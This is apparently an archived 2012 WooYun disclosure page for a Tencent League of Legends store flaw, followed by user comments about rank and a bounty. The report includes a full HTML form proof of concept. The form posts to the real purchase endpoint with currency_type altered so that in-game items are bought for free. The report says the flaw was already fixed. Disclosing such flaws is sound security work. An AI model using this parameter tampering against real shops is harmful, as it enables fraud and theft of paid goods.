当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2012-05423

漏洞标题:英雄联盟刷钱漏洞

相关厂商:腾讯

漏洞作者: 锄禾哥

提交时间:2012-03-20 22:04

修复时间:2012-03-21 09:20

公开时间:2012-03-21 09:20

漏洞类型:网络设计缺陷/逻辑错误

危害等级:低

自评Rank:2

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2012-03-20: 细节已通知厂商并且等待厂商处理中
2012-03-21: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

英雄联盟刷钱漏洞,可以买任何商城东西不用钱

详细说明:

http://store.lol.qq.com/store/purchase/item
这个action中。
currency_type参数控制不严。
比如需要游戏金币买的东西,他原本的值为
currency_type=ip
他action判断currency_type中的类型的值的数据。
如果改成currency_type=rp.因为金币道具rp(人民币)是0,所以就会不花钱购买成功。

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>无标题文档</title>
</head>
<body>
<form action="http://store.lol.qq.com/store/purchase/item" method="post">
<input name="item_id" type="text" value="boosts_9" />
<br />
<input name="currency_type" type="text" value="ip" />
<br />
<input name="quantity" type="text" value="9" />
<br />
<input name="rp" type="text" value="" />
<br />
<input name="ip" type="text" value="" />
<br />
<input name="duration_type" type="text" value="PURCHASED" />
<br />
<input name="duration" type="text" value="10" />
<br />
<input name="submit" type="submit"  value="提交"/>
</form>
</body>
</html>


item_id即为传入需要买的道具ID

漏洞证明:

已经和量子工作室报告过了,已经修复,我来这里赚rank的,顺便和大家分享这个问题出现的原因。
顺便答应的RMB什么时候给啊 cry~~~

修复方案:

美国人知道

版权声明:转载请注明来源 锄禾哥@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2012-03-21 09:20

厂商回复:

非常感谢你的反馈,由于是历史漏洞且已经修复,故不给rank

最新状态:

暂无

漏洞评价:

评论

  1. 2012-03-20 22:31 | Eoh ( 普通白帽子 | Rank:286 漏洞数:35 )

    不会是又跟 新浪云豆一样的把

  2. 2012-03-20 22:44 | imlonghao ( 普通白帽子 | Rank:730 漏洞数:74 )

    最近这个漏洞火了。。

  3. 2012-03-20 23:21 | wanxx ( 路人 | Rank:6 漏洞数:1 | 无)

    TX会不会感谢你啊!

  4. 2012-03-20 23:32 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    X一下

  5. 2012-03-20 23:40 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    火了火了火了火了火了

  6. 2012-03-21 01:30 | Blackeagle ( 实习白帽子 | Rank:62 漏洞数:10 | 向WooYun致敬)

    无限刷钱。。要2RANK,有点少了。

  7. 2012-03-21 04:22 | K1night ( 路人 | Rank:0 漏洞数:2 )

    -_-$

  8. 2012-03-21 07:32 | 锅巴 ( 路人 | Rank:2 漏洞数:1 | 学生而已)

    留个名

  9. 2012-03-21 13:59 | Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)

    已经修复,我来这里赚rank的, 厂商回复的.由于是历史漏洞且已经修复,故不给rank...洞主 杯具不

  10. 2012-03-21 15:37 | 锄禾哥 ( 实习白帽子 | Rank:96 漏洞数:18 | <script>alert('我没帽子')</script>)

    不杯具。之前腾讯不是有一个新闻嘛,求外挂,1WRMB+5WQB,交涉了半天答应了1WRMB,不过还没给我,说是还要等 这才杯具

  11. 2012-03-21 16:14 | K1night ( 路人 | Rank:0 漏洞数:2 )

    @锄禾哥 正常大公司手续比较多,总是要交涉一下,有个申请流程嘛。

  12. 2012-03-21 16:34 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    @锄禾哥 ...

  13. 2012-03-21 20:01 | 锅巴 ( 路人 | Rank:2 漏洞数:1 | 学生而已)

    @锄禾哥 是你提高的那外挂吗,贴吧里各种讨论

  14. 2012-03-21 20:42 | 锄禾哥 ( 实习白帽子 | Rank:96 漏洞数:18 | <script>alert('我没帽子')</script>)

    贴吧?没有。没发出去过,第一时间就直接报告腾讯了

  15. 2012-03-25 14:12 | fans ( 路人 | Rank:5 漏洞数:1 | 关注安全,关注漏洞)

    怎么好的漏洞居然不给rank

  16. 2012-11-07 17:22 | 锄禾哥 ( 实习白帽子 | Rank:96 漏洞数:18 | <script>alert('我没帽子')</script>)

    经过大半年,企鹅终于打款了,8000RMB 扣了税 = =!!

  17. 2012-11-07 18:17 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    @锄禾哥 ...

  18. 2012-11-07 19:48 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @锄禾哥 QB呢……我昨天不小心把我某个号码的积分刷成500w了,不敢用……

  19. 2012-11-24 12:10 | 锄禾哥 ( 实习白帽子 | Rank:96 漏洞数:18 | <script>alert('我没帽子')</script>)

    @一刀终情 没有QB,能从企鹅手上挖掘到RMB,我都觉得很NB了。

  20. 2012-11-24 13:32 | 水滴 ( 普通白帽子 | Rank:146 漏洞数:24 )

    @一刀终情

  21. 2012-11-24 22:02 | 一刀终情 ( 普通白帽子 | Rank:156 漏洞数:28 | ‮‮PKAV技术宅社区-安全爱好者)

    @锄禾哥 现在送ipad,赶紧挖,多的便宜点卖我